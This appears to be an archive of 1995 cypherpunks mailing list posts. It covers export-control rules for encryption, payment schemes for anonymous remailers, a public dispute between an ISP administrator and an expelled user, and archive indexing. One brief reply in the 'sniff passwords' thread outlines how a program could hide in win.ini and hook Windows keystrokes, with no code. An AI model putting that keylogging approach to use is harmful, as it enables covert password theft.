pleasant enough, though, and at least didn't look at me as if she intended to send me to jail or have me strip searched. Finally, she finished with the plane and asked me for my form. She studied it carefully, obviously never having seen one before, and eventually asked me what, exactly, she was supposed to do. I explained that I had never actually gone through this process before but I understood that she's supposed to record the fact that I was re-importing the device and stamp my license somewhere. She told me that she didn't know of any place for her to record this. After some discussion, we agreed that the best thing to do was to make a Xerox copy of my license and arrange for it to go wherever it had to go later. She stamped the back of the license and sent me on my way. It was a little over an hour after I first reached the Customs desk. My conclusion from all this is that it just isn't possible for an individual traveler to follow all the rules. Even having gone through the process now, I still have no idea how to obtain, let alone file, the proper forms, even for a device that's already been determined to be exportable. The export of export-controlled items is ordinarily handled by cargo shipment, not by hand carrying by travelers, and the system is simply not geared to deal with exceptions. Technically speaking, everyone with a laptop disk encryption program who travels abroad is in violation of the law, but since no one actually knows or checks, no mechanism exists to deal with those who want to follow the rules. While (fortunately) everyone I dealt with was sympathetic, no one in the government who I spoke with was able to actually help me follow the rules. I was permitted to leave and come back only because everyone involved eventually recognized that my telephone was pretty harmless, that my intentions were good, and that the best thing to do was be flexible. If anyone had taken a hard line and tried to enforce the letter of the law, I simply wouldn't have been able to take the thing with me, even with my license. Had I just put my telephone in my suitcase without telling anyone instead of calling attention to myself by trying to follow the rules, chances are no one would have noticed or cared. Unfortunately, however, these absurd rules carry the full force of law, and one ignores them only at the risk of being prosecuted for international arms trafficking. While it may seem far-fetched to imagine US citizens prosecuted as arms smugglers simply for carrying ordinary business products in their luggage, the law as written allows the government to do just that. At the same time, anyone who is aware of and who tries to follow the regulations is made to jump through pointless hoops that are so obscure that even the people charged with enforcing them don't know quite what to make of them. Copyright 1995 by Matt Blaze. All rights reserved. Electronic redistribution permitted provided this article is reproduced in its entirity. From dcwill at python.ee.unr.edu Fri Jan 6 14:12:05 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 6 Jan 95 14:12:05 PST Subject: Remailer Abuse Message-ID: <199501062217.RAA29043@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > >Why? Why wouldn't the FV remailers use settlements? At the end of > >the month, everyone settles accounts in re who gets what fraction of > >what. No logs are needed other than counters. > Oh, you're suggesting that I'd only actually pay the first remailer on my > chain, and at the end of the month he'd pay some of the money I (and > others) paid him to all of the other remailers his transacted with over the > month? Way too complicated . . . Why not establish a system where the only the first remailer is paid and all subsequent remailers agree to accept traffic from other remailers without compensation? Assuming that first remailer use is or would be somewhat distributed, the net from each remailer would approach the same figure reached by endlessly confusing cross-payments (A pays B, C, and D, B pays A, C, and D, etc.). Only non-remailed access would be subject to a fee. Operators with the best net. reputations and those whose remailers are especially full featured or prompt will likely receive more use as "entry" remailers; this is good capitalism which should not only increase their number but improve the state of remailers in general. If someone wants to establish a remailer that will join the existing mesh of remailers, it will have to accept messages from others gratis if it wants such access to the rest of them. Its compensation would be derived from initial traffic. Maybe this would also encourage operators to beat the bushes for traffic, which would also be a Good Thing. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3BayoZzwIn1bdtAQECegGAjSdkX8YYygLJkk1K/Sr6A84QpdNOXbUq uuWxqbSg+6T3Tac+GKdxdNw2SqdExIrV =z/ms -----END PGP SIGNATURE----- From drechsau at winternet.com Fri Jan 6 14:12:55 1995 From: drechsau at winternet.com (Mike Horwath) Date: Fri, 6 Jan 95 14:12:55 PST Subject: Files and mail In-Reply-To: Message-ID: [This is hopefully going to be my only message on this matter, questions or comments, just reply to me directly] > A written reply will suffice. > You have my permission to make all of my files world readable. > You can put them in the ftp site. Since you are posting this to so many people, they can all see my reply. And this is a written reply :) > Upon receipt of notice, they will be removed within 24 hours, > and you will recieve a signed PGP statement with the new key, > stating that the files have been removed. Other Winternet users have > already gone to my defense, and copied all of the world readable > material anyway. And the whole account might as well be, too. Fine, when I have things packed up, they will be moved and you will be notified. > Please do not forward any mail here. You will better serve yourself > bouncing the letter back to the sender and informing them of my new > address. If I find forwarded mail in my mailbox, I will print hard > copies and visit the Attorney General's Office and file a complaint > under the Stalking laws of the State of Minnesota. You can either take the alias in my alias database or have no forwarding address left, that is your choice. We are courteous enough to forward for you, take it or leave it. And stalking laws? I don't think so. There is a difference in notification and stalking and my email to you is far from stalking. > And please...deactivate my WWW pages. I was astounded to find out > that during the suspension, they continued to remain active, as I > learned in the office Wednesday. That was (and still is) stealing my > net.web.goodwill, and creating a falsehood amongst other users. They were left there because they are of use to the 'net and until I could hear from you what you wanted done with your files, there was no need to remove the WWW pages or your account. Now that we have your decision, everything will be removed. And stealing? You had them up for public consumption for many weeks. Did everyone who touched your page steal then? So, no, no advantage was taken by us via your WWW pages. > I spent six full hours making a personal appearance, at great > personal expense, to the Winternet Office to resolve the situation. Great personal expense? This is going to be fun. I don't think harassing Chad (my intern) or Doug (my roommate) for 6 full hours a very nice thing to do at all. If you had wanted to meet me there, you could have had one of them call me, or if they did not have the number for where I was at that day (which happened to be my first complete day off in a few weeks), you could have dropped me email stating you were at the office to discuss this. I was only 10 minutes away at a friends house to escape work. I am pretty sure they told you I was taking a day off after they found out from me. I was going to be in, I decided to rest instead. So sue me for it. No Carol Anne, you did not have any 'great personal expense', what you did do was impose yourself on two people for 6 hours. You also then used our basic login on our console machines, which is there for when people come to visit, to post messages to UseNet and to send and receive email. Not very nice now is it? When service was suspended, it meant all service, not just your account on the main machines. Talk about net.good.will...you stole service after it was suspended. > My original reply still sits in suspended composition in my mailer. I > wasted not a nano-second in preparing my reply to the posting. In legal > point of fact, the poster is violation of Minnesota State Law. He has > no legal jurisdiction whatsoever. What are you talking about now? I hope you don't think I am taking legal action for something, because that would be just funny to hear. Your account was terminated for a breach in our AUP, not because you caused me or Winternet harm. > I did not take days to "investigate", nor cite that other things such as > "my machines being hacked" and "I'll do it when I'm ready to do it,". First day, monday, when I suspended your account, you did not even feel it was resonable to call me when I had written a message to your screen explaing that we needed to talk. Tuesday, after being up for 20+ hours and getting a couple hours sleep, you call and harass me at home even more about the status of your account. I told you I wanted to investigate these instances and that I did not have the time because I was dealing with some hackers who had tried to break in. Again, sue me, this time for being tired. Wednesday, I was going to be into work, which you assumed I would be, but did not bother to call to make sure I was around. I decided I was going to take that day off I had been trying to take and did NOT find out you were in the office until late afternoon Wed. I asked Chad and Doug why you were there, and they said they did not know. If you had wanted to see me to talk about this, you should have spoken up. The machine being down was not used as an excuse, but it is hard to operate like we used to with only one user machine. This is a piece of stress on me, which was never taken out on you or on any other user. > I was a simple complaint. It had no validity. Crossposting an article to > .1% of the Usenet News Groups does not by the very statistic constitute > spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is. What you consider spamming, and what others do, is two different things. I explained my views, you have seen our AUP, and it was in my judgement, and later, after talking with my peers, their judgement, that things had gone too far. Should I also bring to light your unsolicited mailings you did to users on Winternet and others out to the 'net? Remember those? Something about selling web pages from your account, which I had told you I would rather you did not do, very politely I might add. Or what about the net cash mass mailing you did to people? That is 2 counts in 2 days (notified on monday, early, of the spamming, notified on wed of the mass unsolicited mailings). Sorry, someone had to put their foot down, and it happened to be us. > The crossposting wasn't wasting resources. It was innapropiate for the groups that you posted to. > It is of no one's concern the actual groups posted. It is when others have to read it. > They have the right and ability to respond. And they did, both to you, you have stated, and to me, as the admin of Winternet. > I asked for no money. I did not stand to profit by the posting. That doesn't matter, it was still innapropiate to post this message to the groups you posted to. > The person who started the whole thing was pretty heavily chastised, > by the readers of his own news group. Huh? > A fast "K" was all that any individual needed for this article. Uhuh, we could have done that for C&S also, but it would not have helped. > No, Mr. Horwath, you are "way out-of-bounds" this time. > And as the time cronology unveils itself, I am sure that > will be shown to be a very truthful, factual statement. Sorry Carol Anne, but this is a system I administer and I use the AUP to protect all of us accross the 'net. This was not an attack against you. You were not judged unfairly. What you did was break our agreement and for this, you lost your service. Also, you hadn't paid for your account for over 10 weeks, so why are you bitching so much anyway? We had talked about the winternet t-shirts and how we would use the work you did and the monies you would receive as payment. Well, no t-shirts have gone out and at this time, I will be cancelling all orders for them and will redesign them and have them produced externally to what you have done. This is what happens when you hold something over someones head. > Dangerous precedents were set here. I will not rest until the > whole of the Internet knows and is aware of the situation. Then spam again, Carol Anne. > Signed > Carol Anne Braddock > Friday January 6th, 1995 9:40 A.M. > On Fri, 6 Jan 1995, Mike Horwath wrote: > > > You are welcome to your files and mail, I will pack everything up for > > you as you left it, including your FTP area. > > > > I expect you to try to reach me today in the afternoon at my office and > > I will fully explain why your account was deleted, with full detail as > > to why. > > > > I do appreciate the work you did on the shirts for Winternet. I don't > > appreciate the harassment you have already tried to bring upon me. > > > > When we talk, I think you might understand why this was done. If you do > > not, then I feel bad, as I must then not be making myself clear. But > > no matter what, this was policy that you chose to break even after I > > had talked to you about it. More on this when we talk. > > > > Good luck at your new provider, Larry Leone is an old user of mine and > > seems to be a good guy, even if a little quiet on the newsgroups :) > > > > A copy of this letter is also going to your new admin so that he knows > > what is going on. > > > > Larry, Carol Anne was using about 11.5MB of disk that will be moving > > over from Winternet to MM. > > > > Also, how have you been anyway? Been awhile since I saw you. Oh, and > > could you install identd on your system? Get back to me on anything, > > or with questions. > > > > -- > > Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com > > Winternet: info at winternet.com root at jacobs.mn.org <- Linux! > > Twin Cities area Internet Access: 612-941-9177 for more info > > Founding member of Minnesota Coalition for Internet Accessibility [all previously included messages left intact] -- Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com Winternet: info at winternet.com root at jacobs.mn.org <- Linux! Twin Cities area Internet Access: 612-941-9177 for more info Founding member of Minnesota Coalition for Internet Accessibility From jamesd at netcom.com Fri Jan 6 14:19:53 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 6 Jan 95 14:19:53 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) In-Reply-To: Message-ID: On Fri, 6 Jan 1995, Jonathan Rochkind wrote: > Hmm. Maybe I don't completely understand how this is going to work, but > won't _every_ remailer in the chain need to know your FV billing account? First remailer knows you and your FV billing account. Charges you its own fee and the fee for all for profit remailers in the list. (The envelope states what this fee is going to be) Second remailer charges first remailer. Third remailer charges second remailer. If the postage on the envelope is insufficient to cover all the for profit remailers the message passes through, it gets bounced or dropped. In principle it could work, But blinded digital cash makes it a lot easier. (blinded postage stamps) I would not try to implement it. Too much like hard work, for an unnecessarily complex solution. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From cactus at seabsd.hks.net Fri Jan 6 14:33:37 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 14:33:37 PST Subject: public vs. private replies Message-ID: <199501062238.RAA29242@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <199501060807.DAA22166 at bb.hks.net>, L. McCarthy wrote: >Tim May writes: >> In my opinion, having personal access >> to past posts is several orders of magnitude more important than >> having MIDI-MIME JPEG-II TeX players [...] > >It takes more disk space from one's personal quota, though (for those who >suffer under such restrictions). :[ All posts to cypherpunks since June '94 are available by ftp from ftp.hks.net:/cypherpunks/nntp/cypherpunks. They are also available via nntp from nntp.hks.net:hks.lists.cypherpunks. I'd be glad to put a search engine of some sort on them, either by Web or by mailserver, if someone can suggest a reasonable way to index the whole lot. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h l07wq41l2L0= =Ao+S - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c =6bFr -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Fri Jan 6 14:40:13 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 14:40:13 PST Subject: Remailer Abuse Message-ID: <199501062245.RAA29327@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- At 5:10 PM 01/06/95, Dr. D.C. Williams wrote: [suggestion that only the first remailer would get payed, with justification for that.] >Operators with the best net. reputations and those whose remailers are >especially full featured or prompt will likely receive more use as >"entry" remailers; this is good capitalism which should not only increase >their number but improve the state of remailers in general. If someone >wants to establish a remailer that will join the existing mesh of remailers, >it will have to accept messages from others gratis if it wants such access >to the rest of them. Its compensation would be derived from initial traffic. Yeah, that does seem possible. One thing to keep in mind, though, is that it's really the _last_ remailer in the chain that's taking the most heat, and it would be nice if they got payed. There's also an issue of some remailers refusing to be last in the chain, so they dont' expose themselves so much. So the remailers which _did_ agree to be last in the chain would obviously get used for this purpose, while the others wouldn't, but they wouldn't get any more money for it. They might even get less, since most people probably don't use the same remailer twice in a chain, so the ones agreeing to be last are hardly ever going to be first. That seems undesirable. Ideally, the forces of capitalism would work on the last remailer on the chain, rather then (or in addition to) the first, to increase the number of remailers willing to do this. All this goes triple for mail-to-news remailers, since that poses even more exposure to heat, and it would be nice if ops were conpensated for. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3H8yoZzwIn1bdtAQHFWwGAqDhDUgU4+I4wLsqR8AwHEm09E9lqVjCX IcKjz280k1pK3MLaOMTCueXVUaZCam6u =4Wi5 -----END PGP SIGNATURE----- From nsb at nsb.fv.com Fri Jan 6 14:45:36 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 14:45:36 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) In-Reply-To: <4715.789430801.1@nsb.fv.com> Message-ID: Excerpts from fv: 6-Jan-95 Re: for-pay remailers and F.. "James A. Donald"@netcom (1127*) > On Fri, 6 Jan 1995, Jonathan Rochkind wrote: > > Hmm. Maybe I don't completely understand how this is going to work, but > > won't _every_ remailer in the chain need to know your FV billing account? > First remailer knows you and your FV billing account. Charges you > its own fee and the fee for all for profit remailers in the list. > (The envelope states what this fee is going to be) > Second remailer charges first remailer. > Third remailer charges second remailer. > If the postage on the envelope is insufficient to cover all > the for profit remailers the message passes through, it gets > bounced or dropped. > In principle it could work, Yes, I think you've probably just identified a *second* way it could work. I agree it's awfully complex, though. I'd prefer my consortium approach, but it's nice to see that multiple models are possible. -- Nathaniel From nsb at nsb.fv.com Fri Jan 6 14:45:49 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 14:45:49 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) In-Reply-To: <2292.789427808.1@nsb.fv.com> Message-ID: Excerpts from fv: 6-Jan-95 for-pay remailers and FV (W.. jrochkin at cs.oberlin.edu (4416*) > Hmm. Maybe I don't completely understand how this is going to work, but > won't _every_ remailer in the chain need to know your FV billing account? > How would the rest of them charge via FV without knowing your billing > account? What Russell was suggesting (I think), was that only the first > would bill via FV directly, so only the first would need to know your > billing account, and then he'd settle up with the others at the end of the > month. (A particular variation of that scheme is what you mentioned later > in your message, and I'll get to that). The latter is what I was proposing. Only the first one would charge via FV, but the other ones would form a "closed system" that you could only get into by going through one that charged. > But assuming that every remailer along the chain _was_ charging via FV, I > fail to see how only the last one would need your billing account; seems to > me they all would, and thus any one could collude with FV to violate your > anonimity. That's not my assumption. I think you may have misread my mail -- I *agree* with you on this point. Sorry if I was unclear! > The > remailer operators still have to have an organization and remain in close > contact, which I am uncomfortable with because it seems to make collusion > more likely. As I said, it all depends on your level of paranoia.... I tend to think that in such an organization, where the primary "product" is privacy, each member would tend to watch all the other members like hawks, eager to publicize any instance of the other guy not being sufficiently zealous in protecting privacy. (Of course, I'm assuming that people like *you* will be running these services, i.e. people even more paranoid about privacy than me.) > And it's still dificult to intermix for-pay and free remailers > within your chain, or even just for-pay remailers from several different > consortiums. I think this is wrong. In my model, each consortium model has two, a for-pay and a for-free. Anyone can send to a for-pay, but only a consortium remailer can send to a for-free. Not that complicated, really. > [The > consortium, as far as I can tell, would also find it rather dificult to > charge more for a longer chain, I can't think of any way for them to charge > anything excpet a uniform amount regardless of length of chain, unless you > give the first remailer a way to tell the length of your chain, which is > undesirable. I'm not sure if this is a problem.] To my mind, that's not a bug, it's a feature. The consortium is charging you a set fee for privacy, and you get to decide how many hops are required to have a level of privacy you trust. > And this level of paranoia would be perfectly well surved by a Julf/penet > style remailer, which _would_ work well with an FV-payment system, as I > agreed before. The cypherpunks chained remailernet system as a whole is > overkill for your paranoia needs, but appearantly not for the needs of > those who use it over Julf's. It appears to me, that an FV-style payment > scheme can't be added to the cypherpunks chained remailer system without > dropping it's security to the level of Julf's. Which might be good enough > for you, but not good enough for me, or presumably for anyone else that > uses cypherpunks remailers. This is true of the scheme that I said I would be satisfied with (one remailer + FV), but not true, I think, of the "overkill" scheme, which was the consortium. > [Do you understand how cypherpunks remailers work, and the difference > between them and a julf/penet style remailer? Do you understand how > encryption is used in a cypherpunks-style remailer chain to make it so each > individual remailer only knows the next remailer along the chain, and not > the entire rest of the chain?] Well, I *think* I do, though I may be suffering from a bit of dilletantism here -- I'm certainly no expert in cryptography, but I think I understand the concepts involved. We haven't even gotten into the effect of encryption yet -- so far, we've just been talking, I thought, about untraceability. But as far as I can see, there's no reason that the consortium pay-only-at-entry scheme couldn't work with encrypted remailers. Am I confused? Couldn't you use the same cryptographic chain as is currently used, where all the inner entries in the chain are free crypto-remailers open only to other consortium remailers, but in which the outer encrypted message had the FV payment attached, which gained it entry to the remailer pool? > Try to bring up objections to a digicash-style system that are applicable > to remailers. I agree that they are different technologies that fill > different requirements, but it seems to me that the particular requirements > of a remailer system are only met by a digicash/magic money style > technology. Again, I think you mis-read me. I haven't (nor do I care to) spent a lot of time thinking about how to do remailers at all, let alone with digicash. What I was referring to was the basic objections that come from using a digital cash scheme in the first place. > I think an electronic cash system that will work with remailers, must > satisfy these things: > 1) You need to be able to enclose the "signifyer" of the transaction inside > encryption. Whether the "signifyer" is the cash itself, or an agreement to > make a transaction together with a billing number, or whatever, you need to > be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted > block. > 2) The "signifyer" of the transaction (which again might theoretically be > the cash itself, or some kind of billing number) alone shouldn't be enough > to reveal the identity of the anonymous user. I agree that FV doesn't meet the above requirements, but I don't see why they're necessary for remailers. In the consortium scheme I'd proposed, the only thing that could ever be proven about you would be that you had used a remailer. Now, if the message was not encrypted, your anonymity could be broken by collusion of FV and the "entry" remailer. But if the cypherpunks style cryptographic chain was used, i.e. if the contents (including an inner envelope that said who you really sent it to) were encrypted, nothing more would ever be derivable without the collusion of everyone in the chain, and even then it would only be derivable if certain records were kept. All I'm claiming is that it's do-able using the FV payment system. I'm not going to do it myself because I don't personally feel that this level of untraceability is EVER legitimately necessary..... -- Nathaniel From rah at shipwright.com Fri Jan 6 15:10:09 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 6 Jan 95 15:10:09 PST Subject: floating point crypto? Message-ID: At 6:51 PM 1/5/95, Timothy C. May wrote: >Robert H. has asked that we reply in e-mail to him, to avoid >"cluttering the list more than I already have...," but the logic of >this is faulty. The few lines of a response such as this one, or even >of several such responses, are as nothing compared to dozens or more >people sifting their own archives so they can each independently send >Robert what they find. Hence my public reply. Got that right. No one can be more chagrined than I about this, because I've seen it happen. I remember Way Back in Ancient History (1985) when someone who couldn't remember the name of the movie posted the plot to "Slient Running" to net.sf(?), and asked for e-mail answers, so it "wouldn't clog the newsgroup". He was begging for mercy as little as 4 hours later... How soon they forget. I'm lucky it didn't happen to me. Thanks Tim, for saving my bacon. Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim said he got it out of WWW, and maybe he'll post the URL here and that will be that. Nicely was working with finding multiple primes: Prime twins, prime triplets, etc. I will now proceed to post the relevant bits of Jim's and Tim's stuff to the newsgroup I got "called" in. Thanks to everyone who sent me comments, pointers, etc. >Not to sound strident, but if folks would keep copies of articles and >spend some time organizing them in data bases or in other searchable >forms, this would help the list. In my opinion, having personal access >to past posts is several orders of magnitude more important than >having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R >Us" in the correct font and with the "R" reversed according to spec. Indeed. Having limited space on my poor PowerBook, I have kept mostly the "excrable e$" types of files, to wit: anything mentioning money, finance, economics, and whatever crypto is specific to those areas. Since I started hanging out here this spring, I've accumulated about 10 megs of stuff between this list and www-buyinfo. I just archived everything from November backwards into Stuffit-compressed Eudora mailboxes. If you want those, I've got 'em. I did search the files I have after the "great squeeze", but to no avail. Unfortunately, I did not think I would have to keep anything to do with WIntel and their potential tribulations. I am, after all a Certified Macintosh Bigot�. Thanks again, everyone. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From dcwill at python.ee.unr.edu Fri Jan 6 15:19:15 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 6 Jan 95 15:19:15 PST Subject: Remailer Abuse Message-ID: <199501062324.SAA29816@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Jonathan replied: > One thing to keep in mind, though, is that it's really the _last_ remailer > in the chain that's taking the most heat, and it would be nice if they got > payed. Unfortunately, this creates the closest association between specific traffic and paying customers. > There's also an issue of some remailers refusing to be last in the > chain, so they dont' expose themselves so much. So the remailers which > _did_ agree to be last in the chain would obviously get used for this > purpose, while the others wouldn't, but they wouldn't get any more money > for it. What's to prevent mail from remailer A sent to remailer B from being sent right back to A for delivery? That's a part of the mixing required for true randomness. I don't know if this is being done now (by Chain or premail), and I'd like to know why. There might well be a good reason I'm not aware of. In order to join the mesh, remailers would be required to accept and ultimately deliver mail to ensure equality among them. I believe that a class of "prime" remailers would arise; these would be the preferred remailers, and their input and output would largely be balanced. This assumes, of course, that "second-class" remailers (those which profit equally but don't deliver as the last unit in the chain) aren't allowed in on a equal basis. Prime operators deserve, and would receive, compensation. > They might even get less, since most people probably don't use the > same remailer twice in a chain, so the ones agreeing to be last are hardly > ever going to be first. That seems undesirable. See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ? If someone is logging messages and routing, it's less secure, but then so is the entire remailer system. Prime remailer operators are those who don't log. Maybe message size would tip off snoopers. This can be overcome with minor tweaking to existing remailer code by tacking on or or eliminating padding to messages. But logging still makes the whole system extremely vulnerable. > remailers, since that poses even more exposure to heat, and it would be > nice if ops were conpensated for. Agreed. But since the payment "on the way out" (i.e.; a store) is much less desirable (and would probably work to reduce traffic), payment "on the way in" (i.e.; the subway) seems like the preferred alternative. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3RLCoZzwIn1bdtAQHpYgF/brIk7ssBTsR+26TqW6MifGwz+lymbXlc cYWFzNCJcrbRTgy7zHgPisvk/roHW0Nv =XJAq -----END PGP SIGNATURE----- From pstemari at erinet.com Fri Jan 6 15:19:20 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 6 Jan 95 15:19:20 PST Subject: sniff passwords on PC (DOS) Message-ID: <9501062310.AB20311@eri.erinet.com> At 01:00 AM 1/6/95 CST, m00012 at KANGA.STCLOUD.MSUS.EDU wrote: > ... It does not work after starting windows. Not sure, but it seems obvious >that MS windows installs it's own keyboard interrupt. ... True, but it's fairly simple to write a program that loads itselfs in win.ini and also hooks the keyboard messages from Windows. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From tengi at Princeton.EDU Fri Jan 6 15:23:33 1995 From: tengi at Princeton.EDU (Christopher J. Tengi) Date: Fri, 6 Jan 95 15:23:33 PST Subject: Indexing and searching (was Re: public vs. private replies) In-Reply-To: <199501062238.RAA29242@bb.hks.net> Message-ID: <9501062315.AA29835@deepthought.Princeton.EDU> You may want to take a look at glimpse and harvest. Here are some useful URLs for them: http://glimpse.cs.arizona.edu:1994/ http://harvest.cs.colorado.edu/ > -----BEGIN PGP SIGNED MESSAGE----- > > - -----BEGIN PGP SIGNED MESSAGE----- > > In article <199501060807.DAA22166 at bb.hks.net>, > L. McCarthy wrote: > >Tim May writes: > >> In my opinion, having personal access > >> to past posts is several orders of magnitude more important than > >> having MIDI-MIME JPEG-II TeX players [...] > > > >It takes more disk space from one's personal quota, though (for those who > >suffer under such restrictions). :[ > > All posts to cypherpunks since June '94 are available by ftp from > ftp.hks.net:/cypherpunks/nntp/cypherpunks. They are also available > via nntp from nntp.hks.net:hks.lists.cypherpunks. > > I'd be glad to put a search engine of some sort on them, either by > Web or by mailserver, if someone can suggest a reasonable way to index > the whole lot. > - - -- > Todd Masco | "life without caution/ the only worth living / love for a man/ > cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich > Cactus' Homepage > > - -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLw2LTRNhgovrPB7dAQEDNwP/QTydu0Tp68ytNupes18WU+uv159GJJfE > Wy+3iLxj+9rbPJwEKBZlXqhkfV7pf4nK9wNwiwNR4ZF13zpCAljWPhw3BEgNM4Xj > Ity2GWLb8s7PBMplc+ggTQ4LowMYGqoO/e1pBWH3joFCuv11owkf+ZmbvTSZgU7h > l07wq41l2L0= > =Ao+S > - -----END PGP SIGNATURE----- > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBLw3GJCoZzwIn1bdtAQFdVAF8DB7xxjzPgHNj2Eil0zEuLKj8SofCLFAs > HBdXBN2fFjT5mNwnKh5a4T1R1Dv0Zp/c > =6bFr > -----END PGP SIGNATURE----- > From bshantz at spry.com Fri Jan 6 15:35:54 1995 From: bshantz at spry.com (bshantz at spry.com) Date: Fri, 6 Jan 95 15:35:54 PST Subject: The Carol Anne Controversy Message-ID: <199501062336.PAA12592@homer.spry.com> C'Punks, Well, folks, this has certainly been an exciting SPAM/FLAME war we've been watching. I've personally enjoyed skipping a good portion of the text of the messages and just watching the headers continue to grow in size as more and more people have been added to the CC list. Although, I must admit that I enjoyed the Winternet Sysadmin's Rebuttal. Between this and Matt's article about being an international arms courier (Great Article Matt!!!) I've discovered my own answer to the Soap Operas I miss while I'm at work every day. Think I'll go make some popcorn and sit back to watch the fireworks some more. -- Brad From pstemari at erinet.com Fri Jan 6 15:37:15 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 6 Jan 95 15:37:15 PST Subject: Remailer Abuse Message-ID: <9501062326.AA20655@eri.erinet.com> At 03:44 PM 1/6/95 -0500, Jonathan Rochkind wrote: > ... Why? Why wouldn't the FV remailers use settlements? At the end of >>the month, everyone settles accounts in re who gets what fraction of >>what. No logs are needed other than counters. > > ... 1) The initial remailer has no way of knowing how many subsequent links >there are in the chain, and so doesn't know if I've paid him enough to >reimburse everyone else. I can easily cheat. He also doesn't know _who_ >the subsequent chains are. He can deduct one "stamp" from the amount, and >forward the rest on to the next remailer, and trust them to do the same, >but if I'm cheating there won't be enough to make it to the end of the >chain. Both of these facts (initial op doens't know how long the chain >will be, or who will be on it) are essential to the security I get from >using anon remailers, so even if they could be "fixed", it would be bad to. No, basically the idea is that each stamp covers an average number of remailer hops. The remailer ops get together, with counts of their ins and outs to each other, and split some fraction of the stamp prices accordingly. They can even determine the average number of hops given the in/out counts. Fairly simple, actually. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From jim at acm.org Fri Jan 6 15:57:26 1995 From: jim at acm.org (Jim Gillogly) Date: Fri, 6 Jan 95 15:57:26 PST Subject: floating point crypto? In-Reply-To: Message-ID: <199501062358.PAA22404@mycroft.rand.org> > rah at shipwright.com (Robert Hettinga) writes: > Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of > stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim > said he got it out of WWW, and maybe he'll post the URL here and that will > be that. Nicely was working with finding multiple primes: Prime twins, > prime triplets, etc. The page is titled "The Pentium Papers": http://www.mathworks.com/README.html From mpd at netcom.com Fri Jan 6 16:10:51 1995 From: mpd at netcom.com (Mike Duvos) Date: Fri, 6 Jan 95 16:10:51 PST Subject: Files and mail In-Reply-To: Message-ID: <199501070010.QAA02210@netcom10.netcom.com> drechsau at winternet.com (Mike Horwath) carefully explains all the reasons why is it better to have a Netcom account than a Winternet account! > I was going to be in, I decided to rest instead. So sue me > for it. Big providers like Netcom have many employees and many machines. Things do not screech to a halt when "the guy who owns the machine" takes a mental health day. :) > Talk about net.good.will...you stole service after it was > suspended. Free service offered to the public cannot be stolen, even by prior 